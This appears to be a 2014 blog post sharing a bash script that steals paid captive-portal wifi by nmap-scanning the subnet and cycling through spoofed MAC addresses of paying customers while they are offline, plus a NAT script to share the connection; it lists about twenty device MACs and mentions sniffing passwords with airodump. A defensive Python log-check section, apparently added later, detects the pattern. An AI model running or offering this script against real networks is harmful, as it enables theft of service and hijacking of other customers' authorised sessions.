Dec 25 2014


Synopsis

Getting free wifi from an open network that takes you to a "pay to use" page.

History

I am living for the time being on a site that has a wifi service you pay to use. Having my own satellite connection meant that I did not need it at first, but having used up my 10 gig allowance in 10 days, after which the connection drops to a barely usable speed, I decided to have a look at the site wifi. Finding that the login page wasn't SSL, I originally thought it would be a case of leaving a Kali laptop running airodump until it captured a password. I did so, but since I had a load of captured HTTP traffic anyway I thought that MAC address spoofing might get some results. It did! Googling 'mac address spoofing for free wifi' shows that I am by no means the first; this appears to be a very well known exploit. So what I am sharing here is a script that will come in useful for getting the free wifi.

Requirements

  1. Kali Linux. A BackTrack installation would be OK too.

Code (bash)

#!/bin/bash
#my mac a0:f3:c1:0e:b3:9c
#10.0.1.x
#C8:02:10:34:02:0A
#AC:A2:13:28:02:F6
#F4:1B:A1:A0:D3:4B
# Candidate MAC addresses, collected from an earlier nmap scan of the site subnet
conn[0]="00:0D:A3:11:1A:53"
conn[1]="00:0F:04:B3:94:04"
conn[2]="00:15:6D:DA:BC:66"
conn[3]="00:15:AF:46:F1:15"
conn[4]="00:16:6F:CA:CE:8A"
conn[5]="00:1A:EF:36:A3:25"
conn[6]="00:1A:EF:36:A7:41"
conn[7]="00:E3:B2:23:0A:4F"
conn[8]="24:A4:3C:AE:2E:EC"
conn[9]="30:10:B3:06:63:4E"
conn[10]="3C:E0:72:BC:F5:87"
conn[11]="44:91:DB:23:4C:6F"
conn[12]="64:70:02:57:19:1A"
conn[13]="64:70:02:57:35:FB"
conn[14]="68:48:98:4B:87:47"
conn[15]="68:A3:C4:51:B9:B9"
conn[16]="6C:B7:F4:78:19:FF"
conn[17]="94:35:0A:EE:CB:C1"
conn[18]="AC:A2:13:28:02:F6"
conn[19]="C8:02:10:34:02:0A"
conn[20]="CC:52:AF:12:21:17"
conn[21]="F4:EC:38:8F:59:7C"
# test[] records which entries have already been tried in the current cycle
for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
do
    test[$a]=false
done
conn[99]=false
# 99 means "no entry in use yet"
last=99
while true
do
    echo "Pinging..."
    rm capture/ping.txt
    ping -c 5 8.8.8.8 > capture/ping.txt
    # Connectivity counts as lost when every ping fails or ping produced no output at all
    if grep "100% packet loss" capture/ping.txt || [ $(wc -c "capture/ping.txt" | cut -f 1 -d ' ') -eq 0 ]
    then
        # Note: without spaces around '=' this test is a single non-empty string, so it is
        # always true and a fresh scan runs on every loss of connectivity
        if [ $last=99 ]
        then
            ifconfig wlan2 down
            macchanger -p wlan2 > /dev/null
            nmcli con up id Legal
            echo "Scanning site"
            nmap -vv --open -n -sn 10.0.0.0/24 > capture/ls1.txt
            nmap -vv --open -n -sn 10.0.1.0/24 >> capture/ls1.txt
        fi
        found=false
        for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
        do
            # Take the first entry that is absent from the scan, is not the current one and has not been tried yet
            if ! grep -q ${conn[$a]} capture/ls1.txt && ! [ $last = $a ] && [ ${test[$a]} = false ]
            then
                echo ""
                echo "${conn[$a]} ($a) is available"
                echo ""
                ifconfig wlan2 down
                macchanger -m ${conn[$a]} wlan2
                nmcli con up id Legal
                found=true
                last=$a
                test[$a]=true
                break
            fi
        done
        if ! $found
        then
            echo ""
            echo "** No account free !!"
            echo ""
            # Everything has been tried: clear the tried flags and start the cycle again
            for a in 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
            do
                test[$a]=false
                last=99
            done
        fi
    else
        sleep 25
    fi
done

What does it do?

  1. It does an nmap (ping) scan of the site, then checks whether any predefined MAC address is not currently in use, changes the MAC of wlan2 to that one and connects.
  2. It pings 8.8.8.8 every 30 seconds and, if 5 of 5 packets are lost, initiates a scan.
  3. If all addresses are in use or have already been tried, it cycles back to the start.

You will need to populate the initial list of MAC addresses by running an nmap scan of your local subnet yourself.

Why is this better than just spoofing a MAC?

If you just spoof the MAC of an existing client you do get the net, but it is very patchy. This is no doubt because that MAC address is then associated with two different stations that share the same IP. Finding a load of MAC addresses of people who have paid, and using them only while they are not on the network, has proven to be the best approach.
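The weakness being used here is that the portal authorises a session by MAC address alone, and the script leaves two traces a gateway operator can look for: a ping sweep of the whole subnet before each switch, and a paying customer's MAC coming back as a different device. This added Python example (not from the post) runs both checks over a constructed gateway log; the log format, hostnames and the locally administered 02:... MACs are assumptions.

```python
"""Two gateway-side checks for the MAC-reuse pattern above (added example, constructed data)."""
import re
from collections import defaultdict

# Constructed sample of a captive-portal gateway log: DHCP leases and ICMP echo records.
# The format and all MACs (locally administered 02:...) are assumptions for this example.
SAMPLE_LOG = [
    "10:00:01 DHCPACK mac=02:00:00:00:00:01 ip=10.0.1.20 host=alice-phone",
    "10:00:05 DHCPACK mac=02:00:00:00:00:02 ip=10.0.1.21 host=bob-laptop",
    "10:05:00 ICMP src_mac=02:00:00:00:00:02 dst=8.8.8.8",
] + [
    # one station probing every host of 10.0.1.0/24 within the same minute
    f"10:30:00 ICMP src_mac=02:00:00:00:00:99 dst=10.0.1.{i}" for i in range(1, 255)
] + [
    # the phone's MAC comes back, but the lease is now requested by a different device
    "10:31:10 DHCPACK mac=02:00:00:00:00:01 ip=10.0.1.20 host=kali",
]

LINE = re.compile(r"^(?P<t>\S+) (?P<kind>\w+) (?P<kv>.*)$")


def parse(line):
    """Turn 'time KIND k=v k=v ...' into a dict, or None for lines that do not match."""
    m = LINE.match(line)
    if not m:
        return None
    rec = {"t": m["t"], "kind": m["kind"]}
    rec.update(pair.split("=", 1) for pair in m["kv"].split())
    return rec


def find_ping_sweeps(lines, threshold=32):
    """Source MACs whose ICMP echoes reach more than `threshold` distinct hosts."""
    targets = defaultdict(set)
    for rec in map(parse, lines):
        if rec and rec["kind"] == "ICMP":
            targets[rec["src_mac"]].add(rec["dst"])
    return {mac: len(hosts) for mac, hosts in targets.items() if len(hosts) > threshold}


def find_identity_changes(lines):
    """MACs whose DHCP hostname differs from the one seen on their first lease."""
    first_host, alerts = {}, []
    for rec in map(parse, lines):
        if not rec or rec["kind"] != "DHCPACK":
            continue
        mac, host = rec["mac"], rec["host"]
        if mac in first_host and first_host[mac] != host:
            alerts.append((rec["t"], mac, first_host[mac], host))
        first_host.setdefault(mac, host)
    return alerts
```

The lasting fix is not detection but binding sessions to something a bystander cannot observe, such as per-user credentials over WPA2-Enterprise, since a MAC is sent in the clear by every frame.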

Building on this

I built the Kali Linux laptop into a router with the following commands:

#!/bin/bash
# Start
# Configure the IP address of the LAN side (eth0)
sudo ifconfig eth0 192.168.1.100
# Start DHCP/DNS server
sudo service dnsmasq restart
# Enable NAT: clear existing rules, then masquerade traffic leaving via wlan2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan2 -j MASQUERADE
iptables --append FORWARD --in-interface wlan2 -j ACCEPT
#torrent
#iptables -t nat -A PREROUTING -p tcp --dport 53781 -j DNAT --to-destination 192.168.1.99
#iptables -A FORWARD -s 192.168.1.99 -p tcp --dport 53781 -j ACCEPT
# Enable routing
sysctl net.ipv4.ip_forward=1
# Run access point daemon (uncomment to share to a hosted network instead)
# sudo hostapd /etc/hostapd.conf
nmap -vv --open -sn 10.0.0.0/24 -n -oN capture/scan.txt --append-output
nmap -vv --open -sn 10.0.1.0/24 -n -oN capture/scan.txt --append-output
ping 8.8.8.8

The above shares the wlan2 interface over eth0. There is code in there that, if uncommented, shares it to a hosted network instead. If the code is horrible for some reason, that's because the last time I scripted anything under bash was around 6 years ago.
